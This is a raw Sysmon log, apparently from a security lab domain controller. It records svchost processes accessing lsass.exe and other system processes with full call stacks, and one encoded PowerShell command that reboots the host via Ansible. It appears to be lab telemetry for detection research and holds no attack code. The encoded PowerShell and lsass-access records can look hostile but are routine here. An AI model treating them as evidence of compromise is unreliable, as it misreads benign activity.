10:39:18.750{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000552Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.750{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000551Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.750{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000550Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.703{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000549Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.703{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000548Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.703{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000547Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.703{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000546Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.703{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000545Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.703{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000544Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3DD6-5F80-0803-000000007E01}39323388C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-0E03-000000007E01}2168C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000543Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000542Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000541Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000540Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000539Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000538Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000537Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000536Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-0E03-000000007E01}2168C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000535Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000534Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000533Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.687{733EE690-3DD6-5F80-0D03-000000007E01}35843840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD6-5F80-0E03-000000007E01}2168C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+695d331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a741a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a73e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+695254db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a34a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a92edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a76540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a76540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a763d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a68356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a74889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a7447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a741a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a73e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+695254db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a5acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+68a5a2a7(wow64) 154100x8000000000000000532Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.691{733EE690-3DD6-5F80-0E03-000000007E01}2168C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-A6AA-110000000000}0x11aaa60HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{733EE690-3DD6-5F80-0D03-000000007E01}3584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA== 10341000x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 